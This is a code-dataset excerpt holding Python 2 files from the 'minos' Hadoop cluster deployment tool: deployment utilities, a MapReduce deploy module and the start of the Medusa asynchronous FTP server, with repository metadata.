the administrators list or not. Note that\n this will be checked only when security is enabled.\n '''\n status, short_user_name = service_config.get_short_user_name_full()\n args.short_user_name = short_user_name\n\n if is_security_enabled(args):\n if status:\n admin_list = get_deploy_config().get_admin_list()\n if short_user_name not in admin_list:\n Log.print_critical(\"User %s is not an authorized administrator, \"\n \"this operation can't be processed\" % short_user_name)\n else:\n Log.print_critical('You must kinit your kerberos principal first')\n\ndef is_security_enabled(args):\n '''\n Determine if security is enabled or not.\n '''\n get_service_config(args)\n\n if args.service == \"zookeeper\":\n return len(args.zookeeper_config.configuration.generated_files[\"jaas-server.conf\"]) != 0\n elif args.service == \"hdfs\":\n core_site_dict = args.hdfs_config.configuration.generated_files[\"core-site.xml\"]\n return (core_site_dict[\"hadoop.security.authentication\"] == \"kerberos\") and (\n core_site_dict[\"hadoop.security.authorization\"] == \"true\")\n elif args.service == \"yarn\":\n core_site_dict = args.yarn_config.configuration.generated_files[\"core-site.xml\"]\n return (core_site_dict[\"hadoop.security.authentication\"] == \"kerberos\") and (\n core_site_dict[\"hadoop.security.authorization\"] == \"true\")\n elif args.service == \"hbase\":\n hbase_site_dict = args.hbase_config.configuration.generated_files[\"hbase-site.xml\"]\n return (hbase_site_dict[\"hbase.security.authentication\"] == \"kerberos\") and (\n hbase_site_dict[\"hbase.security.authorization\"] == \"true\")\n elif args.service == \"impala\":\n core_site_dict = args.impala_config.configuration.generated_files[\"core-site.xml\"]\n return (core_site_dict[\"hadoop.security.authentication\"] == \"kerberos\") and (\n core_site_dict[\"hadoop.security.authorization\"] == \"true\")\n elif args.service == \"fds\":\n core_site_dict = args.fds_config.configuration.generated_files[\"core-site.xml\"]\n return (core_site_dict[\"hadoop.security.authentication\"] == \"kerberos\") and (\n core_site_dict[\"hadoop.security.authorization\"] == \"true\")\n elif args.service == \"chronos\":\n chronos_dict = args.chronos_config.configuration.generated_files[\"chronos.cfg\"]\n return (chronos_dict[\"zkSecure\"] == \"true\")\n else:\n return False\n\ndef confirm_bootstrap(service, service_config):\n '''\n Let the users confirm bootstrap interactively. Users will be asked to\n set a password, or a random password will be given. The password is\n the verification token when users want to do cleanup.\n '''\n Log.print_warning(\"You should set a bootstrap password, \" \\\n \"it will be requried when you do cleanup\")\n password = str()\n input = raw_input(\"Set a password manually? (y/n) \")\n if check_input(input):\n input = getpass.getpass(\"Please input your password: \")\n if len(input.strip()) >= 6:\n password = input.strip()\n else:\n Log.print_critical(\"The length of the password is at least 6\")\n else:\n Log.print_info(\"A random password will be generated\")\n password = generate_service_token(service, service_config.cluster.name)\n\n Log.print_warning(\"Your password is: %s, you should store this \" \\\n \"in a safe place, because this is the verification code used \" \\\n \"to do cleanup\" % password)\n return password\n\ndef confirm_action(args, action):\n '''\n Let the users confirm the specify action interactively.\n '''\n Log.print_warning(\"You will %s the cluster \\033[31;1m%s\\033[0;33m, \"\n \"do you really want to do this?\" % (action, args.cluster))\n token = generate_random_confirm_token()\n input = raw_input(\"Please input \\033[31;1m%s\\033[0m to confirm: \" % token)\n if check_input(input, token):\n Log.print_info(\"Begin to %s the cluster\" % action)\n else:\n Log.print_critical(\"%s canceled\" % action.capitalize())\n\ndef confirm_cleanup(args, service, service_config):\n '''\n Let the user confirm cleanup interactively. Users will be asked to input\n the password set when the service is bootstrapped.\n '''\n confirm_action(args, 'cleanup')\n\n input = getpass.getpass(\"Please input your installation password: \")\n if len(input.strip()) >= 6:\n return input.strip()\n else:\n Log.print_critical(\"The length of the password is at least 6\")\n\ndef confirm_stop(args):\n '''\n Let the user confirm the stop action interactively.\n '''\n confirm_action(args, 'stop')\n\ndef confirm_start(args):\n '''\n Let the user confirm the start action interactively.\n '''\n confirm_action(args, 'start')\n\ndef confirm_restart(args):\n '''\n Let the user confirm the restart action interactively.\n '''\n confirm_action(args, 'restart')\n\ndef install_service(args, service, service_config, artifact):\n '''\n Install the specified service. Here installation means uploading the\n service package to the package server(Tank).\n\n @param args the command line arguments object\n @param service the service name\n @param service_config the service config object\n @param artifact the artifact name\n '''\n Log.print_info(\"Installing %s to package server\" % artifact)\n package_info = upload_package(args, artifact, service_config.cluster.version)\n if package_info:\n Log.print_success(\"Install %s to package server success\" % artifact)\n pprint.pprint(package_info)\n else:\n Log.print_critical(\"Install %s to package server fail\" % artifact)\n\ndef cleanup_job(service, service_config, host, job_name,\n instance_id, cleanup_token, cleanup_script=\"\"):\n '''\n Clean up a task of the specified service and job. Note that cleanup\n requires that the task must be stopped, so users should stop the task\n before cleanup.\n\n @param service the service name\n @param service_config the service config object\n @param host the host of the task\n @param job_name the job name\n @param instance_id the instance id\n @param cleanup_token the token used to verify cleanup\n @param cleanup_script the user supplied cleanup script\n @param artifact the artifact name\n '''\n real_instance_id = get_real_instance_id(instance_id)\n host_id = get_host_id(service_config.jobs[job_name].hosts, host)\n task_id = get_task_id(service_config.jobs[job_name].hosts, host_id, instance_id)\n Log.print_info(\"Cleaning up task %d of %s on %s(%d)\" % (\n task_id, job_name, host, real_instance_id))\n supervisor_client = get_supervisor_client(host, service,\n service_config.cluster.name, job_name, instance_id)\n message = supervisor_client.cleanup(cleanup_token, cleanup_script)\n if SUPERVISOR_SUCCESS == message:\n Log.print_success(\"Cleanup task %d of %s on %s(%d) success\" % (\n task_id, job_name, host, real_instance_id))\n else:\n Log.print_error(\"Cleanup task %d of %s on %s(%d) fail: %s\" % (\n task_id, job_name, host, real_instance_id, message))\n\ndef bootstrap_job(args, artifact, service, service_config, host, job_name, instance_id,\n cleanup_token, data_dir_indexes='0', bootstrap_script='', **config_files):\n '''\n Bootstrap a task of the specified service and job. Note that before\n bootstrapping users should ensure that the data and log directories at\n the server side are empty.\n\n @param args the command line arguments object\n @param artifact the artifact name\n @param service the service name\n @param service_config the service config object\n @param host the host of the task\n @param job_name the job name\n @param instance_id the instance id\n @param cleanup_token the token used to verify cleanup\n @param data_dir_indexes the data directory indexes\n @param bootstrap_script the user supplied bootstrap script\n @param config_files the config files dict\n '''\n real_instance_id = get_real_instance_id(instance_id)\n host_id = get_host_id(service_config.jobs[job_name].hosts, host)\n task_id = get_task_id(service_config.jobs[job_name].hosts, host_id, instance_id)\n Log.print_info(\"Bootstrapping task %d of %s on %s(%d)\" % (\n task_id, job_name, host, real_instance_id))\n supervisor_client = get_supervisor_client(host, service,\n service_config.cluster.name, job_name, instance_id)\n\n try:\n if (service_config.cluster.package_name and service_config.cluster.revision\n and service_config.cluster.timestamp):\n message = supervisor_client.bootstrap(artifact,\n package_name=service_config.cluster.package_name,\n revision=service_config.cluster.revision,\n timestamp=service_config.cluster.timestamp,\n cleanup_token=cleanup_token,\n bootstrap_script=bootstrap_script,\n data_dir_indexes=data_dir_indexes,\n **config_files)\n elif args.update_package:\n message = supervisor_client.bootstrap(artifact, force_update=True,\n cleanup_token=cleanup_token, bootstrap_script=bootstrap_script,\n data_dir_indexes=data_dir_indexes, **config_files)\n else:\n message = supervisor_client.bootstrap(artifact,\n package_name=args.package_name, revision=args.revision,\n timestamp=args.timestamp, cleanup_token=cleanup_token,\n bootstrap_script=bootstrap_script, data_dir_indexes=data_dir_indexes,\n **config_files)\n if SUPERVISOR_SUCCESS == message:\n Log.print_success(\"Bootstrap task %d of %s on %s(%d) success\" % (\n task_id, job_name, host, real_instance_id))\n else:\n Log.print_critical(\"Bootstrap task %d of %s on %s(%d) fail: %s\" % (\n task_id, job_name, host, real_instance_id, message))\n\n except BaseException, e:\n message = str(e)\n Log.print_error(\"Bootstrap task %d of %s on %s(%d) fail: %s\" % (\n task_id, job_name, host, real_instance_id, message))\n\ndef start_job(args, artifact, service, service_config, host, job_name,\n instance_id, start_script, http_url, **config_files):\n '''\n Start the task of specified service and job.\n\n @param args the command line arguments object\n @param artifact the artifact name\n @param service the service name\n @param service_config the service config object\n @param host the host of the task\n @param job_name the job name\n @param instance_id the instance id\n @param start_script the user supplied start script\n @param http_url the task's http entry url\n @param config_files the config files dict\n '''\n real_instance_id = get_real_instance_id(instance_id)\n host_id = get_host_id(service_config.jobs[job_name].hosts, host)\n task_id = get_task_id(service_config.jobs[job_name].hosts, host_id, instance_id)\n Log.print_info(\"Starting task %d of %s on %s(%d)\" % (\n task_id, job_name, host, real_instance_id))\n supervisor_client = get_supervisor_client(host, service,\n service_config.cluster.name, job_name, instance_id)\n\n if not args.update_config:\n config_files = dict()\n start_script = \"\"\n\n if (service_config.cluster.package_name and service_config.cluster.revision\n and service_config.cluster.timestamp):\n message = supervisor_client.start(artifact,\n package_name=service_config.cluster.package_name,\n revision=service_config.cluster.revision,\n timestamp=service_config.cluster.timestamp,\n http_url=http_url, start_script=start_script,\n **config_files)\n elif args.update_package:\n message = supervisor_client.start(artifact, force_update=True,\n http_url=http_url, start_script=start_script, **config_files)\n else:\n message = supervisor_client.start(artifact, package_name=args.package_name,\n revision=args.revision, timestamp=args.timestamp, http_url=http_url,\n start_script=start_script, **config_files)\n if SUPERVISOR_SUCCESS == message:\n Log.print_success(\"Start task %d of %s on %s(%d) success\" % (\n task_id, job_name, host, real_instance_id))\n else:\n Log.print_error(\"Start task %d of %s on %s(%d) fail: %s\" % (\n task_id, job_name, host, real_instance_id, message))\n\ndef stop_job(service, service_config, host, job_name, instance_id):\n '''\n Stop the task of specified service and job.\n\n @param service the service name\n @param service_config the service config object\n @param host the host of the task\n @param job_name the job name\n @param instance_id the instance id\n '''\n real_instance_id = get_real_instance_id(instance_id)\n host_id = get_host_id(service_config.jobs[job_name].hosts, host)\n task_id = get_task_id(service_config.jobs[job_name].hosts, host_id, instance_id)\n Log.print_info(\"Stopping task %d of %s on %s(%d)\" % (\n task_id, job_name, host, real_instance_id))\n supervisor_client = get_supervisor_client(host, service,\n service_config.cluster.name, job_name, instance_id)\n message = supervisor_client.stop()\n if SUPERVISOR_SUCCESS == message:\n Log.print_success(\"Stop task %d of %s on %s(%d) success\" % (\n task_id, job_name, host, real_instance_id))\n else:\n Log.print_error(\"Stop task %d of %s on %s(%d) fail: %s\" % (\n task_id, job_name, host, real_instance_id, message))\n\ndef show_job(service, service_config, host, job_name, instance_id):\n '''\n Show the state the task of specified service and job.\n\n @param service the service name\n @param service_config the service config object\n @param host the host of the task\n @param job_name the job name\n @param instance_id the instance id\n '''\n real_instance_id = get_real_instance_id(instance_id)\n host_id = get_host_id(service_config.jobs[job_name].hosts, host)\n task_id = get_task_id(service_config.jobs[job_name].hosts, host_id, instance_id)\n Log.print_info(\"Showing task %d of %s on %s(%d)\" % (\n task_id, job_name, host, real_instance_id))\n supervisor_client = get_supervisor_client(host, service,\n service_config.cluster.name, job_name, instance_id)\n state = supervisor_client.show()\n if state == 'RUNNING':\n Log.print_success(\"Task %d of %s on %s(%d) is %s\" % (\n task_id, job_name, host, real_instance_id, state))\n else:\n Log.print_error(\"Task %d of %s on %s(%d) is %s\" % (\n task_id, job_name, host, real_instance_id, state))\n\ndef check_service(host, port):\n '''\n Check whether the given host:port is accessable or not.\n '''\n t = telnetlib.Telnet()\n try:\n t.open(host, port)\n except:\n return False\n t.close()\n return True\n\ndef check_job_stopped(service, cluster, job, host, instance_id):\n '''\n Check whether a specified task is already stopped or not.\n '''\n supervisor_client = get_supervisor_client(host,\n service, cluster, job, instance_id)\n status = supervisor_client.show()\n return status in STOPPED_STATUS\n\ndef wait_for_job_stopping(service, cluster, job, host, instance_id):\n '''\n Wait for a specified job to be stopped.\n '''\n while not check_job_stopped(service, cluster, job, host, instance_id):\n Log.print_warning(\"Wait for instance %d of %s on %s stopping\" % (\n get_real_instance_id(instance_id), job, host))\n time.sleep(2)\n\ndef check_job_started(service, cluster, job, host, instance_id):\n '''\n Check whether a specified task is already started or not.\n '''\n supervisor_client = get_supervisor_client(host,\n service, cluster, job, instance_id)\n status = supervisor_client.show()\n return status == 'RUNNING'\n\ndef wait_for_job_starting(service, cluster, job, host, instance_id):\n '''\n Wait for a specified job to be started.\n '''\n # Wait 10 seconds to let supervisord start the task\n time.sleep(10)\n if not check_job_started(service, cluster, job, host, instance_id):\n Log.print_critical('Instance %d of %s on %s start failed' % (\n get_real_instance_id(instance_id), job, host))\n\n\ndef get_package_uri(artifact, package_name, revision, timestamp):\n tank_config = get_deploy_config().get_tank_config()\n\n return 'http://%s:%s/%s/%s/%s-%s/%s' % (tank_config['server_host'],\n tank_config['server_port'], DOWNLOAD_PACKAGE_URI, artifact,\n revision, timestamp, package_name)\n\ndef get_query_latest_package_info_uri(artifact, package_name):\n tank_config = get_deploy_config().get_tank_config()\n\n return 'http://%s:%s/%s/?artifact=%s&package_name=%s' % (\n tank_config['server_host'], tank_config['server_port'],\n LATEST_PACKAGE_INFO_URI, artifact, package_name)\n\ndef get_latest_package_info(artifact, package_name):\n uri = get_query_latest_package_info_uri(artifact, package_name)\n info_fp = urllib2.urlopen(uri, None, 30)\n info = info_fp.read()\n\n if info and info.startswith('{'):\n info_dict = eval(info)\n info_fp.close()\n return info_dict\n else:\n info_fp.close()\n return None\n\ndef check_cluster_version(cluster, specified_package_name):\n if specified_package_name.find(cluster.version) == -1:\n Log.print_critical(\"The version: %s is inconsistent with \" \\\n \"the package_name: %s\" % (cluster.version, specified_package_name))\n\ndef get_package_info(args, artifact, cluster):\n if (cluster.package_name and cluster.revision and cluster.timestamp):\n check_cluster_version(cluster, cluster.package_name)\n package_name = cluster.package_name\n revision = cluster.revision\n timestamp = cluster.timestamp\n elif (args.package_name and args.revision and args.timestamp):\n check_cluster_version(cluster, args.package_name)\n package_name = args.package_name\n revision = args.revision\n timestamp = args.timestamp\n else:\n package_info = get_latest_package_info(artifact,\n artifact + \"-\" + cluster.version + \".tar.gz\")\n if package_info:\n package_name = package_info.get('package_name')\n revision = package_info.get('revision')\n timestamp = package_info.get('timestamp')\n else:\n Log.print_critical(\"No package found on package server of %s\" %\n artifact + \"-\" + cluster.version + \".tar.gz\")\n\n return {\n \"package_name\": package_name,\n \"revision\": revision,\n \"timestamp\": timestamp,\n }\n\ndef print_progress_bar(message):\n sys.stdout.write(message)\n sys.stdout.flush()\n\ndef download_package(download_uri, dest_file):\n try:\n data_file = urllib2.urlopen(download_uri, None, 30)\n data_size = int(dict(data_file.headers).get('content-length'))\n except urllib2.HTTPError, e:\n Log.print_critical(\"Not found package for uri: %s\" % download_uri)\n\n if not os.path.exists(os.path.dirname(dest_file)):\n os.makedirs(os.path.dirname(dest_file))\n fp = open(dest_file, 'ab')\n\n read_unit_size = 1048576 # read at most 1M every time\n read_size = 0\n bar_length = 70 # print 70 '='\n speed_max_length = 11 # for example, 1023.99KB/s\n\n Log.print_info(\"Package downloading...\\nLength: %s bytes\\nSaving to %s\" % (\n data_size, dest_file))\n start_time = time.time()\n while read_size < data_size:\n read_data = data_file.read(read_unit_size)\n fp.write(read_data)\n read_size += len(read_data)\n progress_bar = '=' * int(float(read_size) / data_size * bar_length)\n\n download_time = int(time.time() - start_time) + 1\n download_percent = int(float(read_size) / data_size * 100)\n blank_bar = \" \" * (bar_length - len(progress_bar))\n read_size_str = format(read_size, ',')\n\n download_speed = float(read_size)/download_time\n if download_speed >= 1024 * 1024:\n download_speed = format(download_speed / (1024 * 1024), '.2f') + 'M' # MB/s\n elif download_speed >= 1024:\n download_speed = format(download_speed / 1024, '.2f') + 'K' # KB/s\n else:\n download_speed = format(download_speed, '.2f') # B/s\n\n speed_blanks = ' ' * (speed_max_length - len(download_speed) - len('B/s'))\n print_progress_bar(str(download_percent) + \"% [\" + progress_bar +\n \">\" + blank_bar + \"] \" + read_size_str + \" \" + speed_blanks +\n download_speed + \"B/s\\r\")\n\n print_progress_bar(\"\\n\")\n Log.print_info(\"Download complete.\")\n fp.close()\n data_file.close()\n\ndef make_package_download_dir(args, artifact, cluster):\n package_info = get_package_info(args, artifact, cluster)\n package_download_path = \"%s/%s/%s-%s/%s\" % (\n get_deploy_config().get_package_download_root(), artifact,\n package_info['revision'], package_info['timestamp'], package_info['package_name'])\n\n # check if the tarball is already downloaded, if not, download it\n if not os.path.exists(package_download_path):\n package_uri = get_package_uri(artifact, package_info['package_name'],\n package_info['revision'], package_info['timestamp'])\n download_package(package_uri, package_download_path)\n\n # unpack the tarball\n package_download_dir = package_download_path[\n 0: len(package_download_path) - len('.tar.gz')]\n if not os.path.exists(package_download_dir):\n cmd = ['tar', '-zxf', package_download_path, '-C', os.path.dirname(package_download_dir)]\n subprocess.check_call(cmd)\n\n return package_download_dir\n\ndef get_artifact_package_root(args, cluster, artifact):\n '''\n Get the artifact package root directory\n '''\n if artifact == 'hbase':\n package_path = \"hbase-%s/hbase-%s\" % (cluster.version, cluster.version)\n else:\n package_path = \"%s-%s\" % (artifact, cluster.version)\n\n artifact_package_root = \"%s/%s\" % (\n eval(\"get_deploy_config().get_\" + artifact + \"_package_dir()\"), package_path)\n\n if os.path.exists(artifact_package_root):\n return artifact_package_root\n else:\n return make_package_download_dir(args, artifact, cluster)\n\ndef parse_shell_command(args, command_dict):\n '''\n Parse the shell command and its options from the command line arguements.\n '''\n if len(args.command) == 0 or args.command[0] == 'help':\n print_shell_help_info(command_dict)\n return (None, None)\n\n command = args.command[0]\n command_info = command_dict.get(command)\n if not command_info:\n Log.print_warning(\n \"Can't find main class of '%s', suppose it's a class name\" % command)\n main_class = command\n else:\n main_class = command_info[0]\n return (main_class, args.command[1:])\n\ndef print_shell_help_info(command_dict):\n '''\n Print the help information for the specified shell commands.\n '''\n help_info=\"help \\tprint this help information\"\n for key, value in command_dict.iteritems():\n help_info += \"\\n%-10s\\t%s\" % (key, value[1])\n print help_info\n\ndef write_file(file_name, content):\n '''\n Write the specified content to the specified file.\n '''\n file = open(file_name, \"wb\")\n file.write(content)\n file.close()\n\ndef make_package_dir(args, artifact, cluster):\n '''\n Make the local package directories.\n '''\n cmd = [\"mkdir\", \"-p\", \"%s/%s/\" % (args.package_root, args.cluster)]\n subprocess.check_call(cmd)\n\n package_path = get_local_package_path(artifact, cluster.version)\n if not os.path.exists(package_path):\n package_path = make_package_download_dir(args, artifact, cluster) + \".tar.gz\"\n\n cmd = [\"tar\", \"-zxf\", package_path, \"-C\", \"%s/%s/\" % (\n args.package_root, args.cluster)]\n subprocess.check_call(cmd)\n\ndef pack_package(args, artifact, version):\n '''\n Pack the package with generated configuration files into a tarball.\n '''\n cmd = [\"tar\", \"-C\", \"%s/%s\" % (args.package_root, args.cluster),\n \"-zchf\", \"%s/%s/%s-%s-%d.tar.gz\" % (args.package_root,\n args.cluster, artifact, version, time.time()),\n \"./%s-%s\" % (artifact, version)]\n subprocess.check_call(cmd)\n\ndef append_to_file(file, content):\n '''\n Append specified content to the specified file.\n '''\n fp = open(file, \"a\")\n fp.write(content)\n fp.close()\n\ndef confirm_rolling_update(host_id, instance_id, wait_time):\n '''\n Let the user confirm the rolling update action interactively.\n '''\n while True:\n if wait_time > 0:\n Log.print_info(\"Waiting %d seconds before updating next task...\"\n % wait_time)\n time.sleep(wait_time)\n\n while True:\n input = raw_input(\"Ready to update instance %d on host %d? (y/n) \" % (\n get_real_instance_id(instance_id), host_id))\n if check_input(input):\n return True\n return False\n\ndef get_zk_address(cluster):\n '''\n Get the zookeeper name address according to the cluster name.\n '''\n return \"bj%s-zk-%s.hadoop.srv\" % (cluster[0:2], cluster[2:])\n\ndef generate_random_confirm_token():\n '''\n Generate a random 8 bytes token used to do confirm\n '''\n return str(uuid.uuid4())[0:8]\n\ndef add_task_to_map(task_map, host_id, instance_id):\n if host_id in task_map.keys():\n if instance_id not in task_map[host_id]:\n task_map[host_id].append(instance_id)\n else:\n task_map[host_id] = [instance_id]\n\ndef parse_task(args, hosts):\n task_map = {}\n for id in args.task:\n task_id = int(id)\n host_id, instance_id = service_config.parse_task_number(task_id, hosts)\n add_task_to_map(task_map, host_id, instance_id)\n return task_map\n\ndef get_task_by_hostname(hosts, hostnames):\n task_map = {}\n for hostname in hostnames:\n host_ip = socket.gethostbyname(hostname)\n found_task = False\n for host_id, host in hosts.iteritems():\n if host.ip == host_ip:\n for instance_id in range(host.instance_num):\n add_task_to_map(task_map, host_id, instance_id)\n found_task = True\n break\n # raise a ValueError if can't find valid task\n if found_task == False:\n raise ValueError(hostname + ' is not a valid host of cluster, please check your config')\n return task_map\n\ndef parse_args_host_and_task(args, hosts):\n # the format of task_map is:\n # { host_1 : [instance_1,instance_2...], host_2 : [instance_1,instance_2...] }\n task_map = {}\n if args.host is not None:\n task_map.update(get_task_by_hostname(hosts, args.host))\n elif args.task is not None:\n task_map.update(parse_task(args, hosts))\n return task_map\n\ndef is_multiple_instances(host_id, hosts):\n # return False if deploy only one instance on the host\n return hosts[host_id].instance_num > 1\n\ndef schedule_task_for_threads(args, hosts, job_name, command, cleanup_token='',\n is_wait=False):\n '''\n Schedule the tasks according to the number of threads and return the task list.\n The task list contains the parameter lists of function called by threads.\n\n @param args the args\n @param hosts the hosts of specific job\n @param job_name the job name\n @param command the deploy command: [bootstrap, start, stop, cleanup]\n @param cleanup_token the cleanup token\n @param is_wait the flag whether to wait for stopping when starting a process\n @return list the task list for threads\n '''\n args.task_map = parse_args_host_and_task(args, hosts)\n first = True\n\n thread_num = 1\n if job_name in PARALLEL_DEPLOY_JOBS and args.thread_num > 0:\n thread_num = args.thread_num\n\n task_list = range(thread_num)\n for index in range(thread_num):\n task_list[index] = []\n\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(\n hosts[host_id].instance_num):\n\n instance_id = -1 if not \\\n is_multiple_instances(host_id, hosts) else instance_id\n\n if command == 'bootstrap' or command == 'cleanup':\n func_args = (args, hosts[host_id].ip, job_name, host_id,\n instance_id, cleanup_token, first)\n elif command == 'start':\n func_args = (args, hosts[host_id].ip, job_name, host_id,\n instance_id, is_wait)\n elif command == 'stop' or command == 'show':\n func_args = (args, hosts[host_id].ip, job_name, instance_id)\n\n task_list[host_id % thread_num].append(func_args)\n first = False\n\n return task_list\n\nif __name__ == '__main__':\n test()\n"
},
{
"alpha_fraction": 0.7131837010383606,
"alphanum_fraction": 0.7145862579345703,
"avg_line_length": 36.52631759643555,
"blob_id": "952bcfa0b2f900d0f417de3a037a141ca10e2673",
"content_id": "f404899569d140d0544b41d7fcdcc304a460b151",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1426,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 38,
"path": "/client/deploy_mapreduce.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import deploy_utils\n\nALL_JOBS = [\"mapreduce\"]\n\ndef get_mapreduce_service_config(args):\n args.mapreduce_config = deploy_utils.get_service_config(args)\n\ndef install(args):\n get_mapreduce_service_config(args)\n deploy_utils.install_service(args, \"mapreduce\", args.mapreduce_config, \"hadoop\")\n\ndef bootstrap_job(args, host, job_name, host_id, instance_id, cleanup_token):\n deploy_utils.bootstrap_job(args, \"hadoop\", \"mapreduce\",\n args.mapreduce_config, host, job_name, instance_id, cleanup_token, '0')\n\ndef bootstrap(args):\n get_mapreduce_service_config(args)\n cleanup_token = deploy_utils.confirm_bootstrap(\"mapreduce\", args.mapreduce_config)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.mapreduce_config.jobs[job_name].hosts\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n bootstrap_job(args, hosts[host_id].ip, job_name, host_id, instance_id, cleanup_token)\n\ndef start(args):\n Log.print_critical(\"'start' command is not supported!\")\n\ndef cleanup(args):\n Log.print_critical(\"'cleanup' command is not supported!\")\n\ndef show(args):\n Log.print_critical(\"'show' command is not supported!\")\n\nif __name__ == '__main__':\n test()\n"
},
{
"alpha_fraction": 0.4871525764465332,
"alphanum_fraction": 0.49788859486579895,
"avg_line_length": 35.32149124145508,
"blob_id": "97677d7fac9108c106203f655943f1948a58817d",
"content_id": "58f5875c0dba5906224fd0064eb824c0db5d5445",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 41915,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 1154,
"path": "/supervisor/supervisor/medusa/ftp_server.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\n# Author: Sam Rushing <[email protected]>\n# Copyright 1996-2000 by Sam Rushing\n# All Rights Reserved.\n#\n\nRCS_ID = '$Id: ftp_server.py,v 1.11 2003/12/24 16:05:28 akuchling Exp $'\n\n# An extensible, configurable, asynchronous FTP server.\n#\n# All socket I/O is non-blocking, however file I/O is currently\n# blocking. Eventually file I/O may be made non-blocking, too, if it\n# seems necessary. Currently the only CPU-intensive operation is\n# getting and formatting a directory listing. [this could be moved\n# into another process/directory server, or another thread?]\n#\n# Only a subset of RFC 959 is implemented, but much of that RFC is\n# vestigial anyway. I've attempted to include the most commonly-used\n# commands, using the feature set of wu-ftpd as a guide.\n\nimport asyncore_25 as asyncore\nimport asynchat_25 as asynchat\n\nimport os\nimport socket\nimport stat\nimport string\nimport sys\nimport time\n\nfrom supervisor.medusa.producers import file_producer\n\n# TODO: implement a directory listing cache. On very-high-load\n# servers this could save a lot of disk abuse, and possibly the\n# work of computing emulated unix ls output.\n\n# Potential security problem with the FTP protocol? I don't think\n# there's any verification of the origin of a data connection. Not\n# really a problem for the server (since it doesn't send the port\n# command, except when in PASV mode) But I think a data connection\n# could be spoofed by a program with access to a sniffer - it could\n# watch for a PORT command to go over a command channel, and then\n# connect to that port before the server does.\n\n# Unix user id's:\n# In order to support assuming the id of a particular user,\n# it seems there are two options:\n# 1) fork, and seteuid in the child\n# 2) carefully control the effective uid around filesystem accessing\n# methods, using try/finally. [this seems to work]\n\nVERSION = string.split(RCS_ID)[2]\n\nfrom counter import counter\nimport producers\nimport status_handler\nimport logger\n\nclass ftp_channel (asynchat.async_chat):\n\n # defaults for a reliable __repr__\n addr = ('unknown','0')\n\n # unset this in a derived class in order\n # to enable the commands in 'self.write_commands'\n read_only = 1\n write_commands = ['appe','dele','mkd','rmd','rnfr','rnto','stor','stou']\n\n restart_position = 0\n\n # comply with (possibly troublesome) RFC959 requirements\n # This is necessary to correctly run an active data connection\n # through a firewall that triggers on the source port (expected\n # to be 'L-1', or 20 in the normal case).\n bind_local_minus_one = 0\n\n def __init__ (self, server, conn, addr):\n self.server = server\n self.current_mode = 'a'\n self.addr = addr\n asynchat.async_chat.__init__ (self, conn)\n self.set_terminator ('\\r\\n')\n\n # client data port. Defaults to 'the same as the control connection'.\n self.client_addr = (addr[0], 21)\n\n self.client_dc = None\n self.in_buffer = ''\n self.closing = 0\n self.passive_acceptor = None\n self.passive_connection = None\n self.filesystem = None\n self.authorized = 0\n # send the greeting\n self.respond (\n '220 %s FTP server (Medusa Async V%s [experimental]) ready.' % (\n self.server.hostname,\n VERSION\n )\n )\n\n# def __del__ (self):\n# print 'ftp_channel.__del__()'\n\n # --------------------------------------------------\n # async-library methods\n # --------------------------------------------------\n\n def handle_expt (self):\n # this is handled below. not sure what I could\n # do here to make that code less kludgish.\n pass\n\n def collect_incoming_data (self, data):\n self.in_buffer = self.in_buffer + data\n if len(self.in_buffer) > 4096:\n # silently truncate really long lines\n # (possible denial-of-service attack)\n self.in_buffer = ''\n\n def found_terminator (self):\n\n line = self.in_buffer\n\n if not len(line):\n return\n\n sp = string.find (line, ' ')\n if sp != -1:\n line = [line[:sp], line[sp+1:]]\n else:\n line = [line]\n\n command = string.lower (line[0])\n # watch especially for 'urgent' abort commands.\n if string.find (command, 'abor') != -1:\n # strip off telnet sync chars and the like...\n while command and command[0] not in string.letters:\n command = command[1:]\n fun_name = 'cmd_%s' % command\n if command != 'pass':\n self.log ('<== %s' % repr(self.in_buffer)[1:-1])\n else:\n self.log ('<== %s' % line[0]+' <password>')\n self.in_buffer = ''\n if not hasattr (self, fun_name):\n self.command_not_understood (line[0])\n return\n if hasattr(self,'_rnfr_src') and fun_name!='cmd_rnto':\n del self._rnfr_src\n self.respond ('503 RNTO Command expected!')\n return\n\n fun = getattr (self, fun_name)\n if (not self.authorized) and (command not in ('user', 'pass', 'help', 'quit')):\n self.respond ('530 Please log in with USER and PASS')\n elif (not self.check_command_authorization (command)):\n self.command_not_authorized (command)\n else:\n try:\n result = apply (fun, (line,))\n except:\n self.server.total_exceptions.increment()\n (file, fun, line), t,v, tbinfo = asyncore.compact_traceback()\n if self.client_dc:\n try:\n self.client_dc.close()\n except:\n pass\n self.respond (\n '451 Server Error: %s, %s: file: %s line: %s' % (\n t,v,file,line,\n )\n )\n\n closed = 0\n def close (self):\n if not self.closed:\n self.closed = 1\n if self.passive_acceptor:\n self.passive_acceptor.close()\n if self.client_dc:\n self.client_dc.close()\n self.server.closed_sessions.increment()\n asynchat.async_chat.close (self)\n\n # --------------------------------------------------\n # filesystem interface functions.\n # override these to provide access control or perform\n # other functions.\n # --------------------------------------------------\n\n def cwd (self, line):\n return self.filesystem.cwd (line[1])\n\n def cdup (self, line):\n return self.filesystem.cdup()\n\n def open (self, path, mode):\n return self.filesystem.open (path, mode)\n\n # returns a producer\n def listdir (self, path, long=0):\n return self.filesystem.listdir (path, long)\n\n def get_dir_list (self, line, long=0):\n # we need to scan the command line for arguments to '/bin/ls'...\n args = line[1:]\n path_args = []\n for arg in args:\n if arg[0] != '-':\n path_args.append (arg)\n else:\n # ignore arguments\n pass\n if len(path_args) < 1:\n dir = '.'\n else:\n dir = path_args[0]\n return self.listdir (dir, long)\n\n # --------------------------------------------------\n # authorization methods\n # 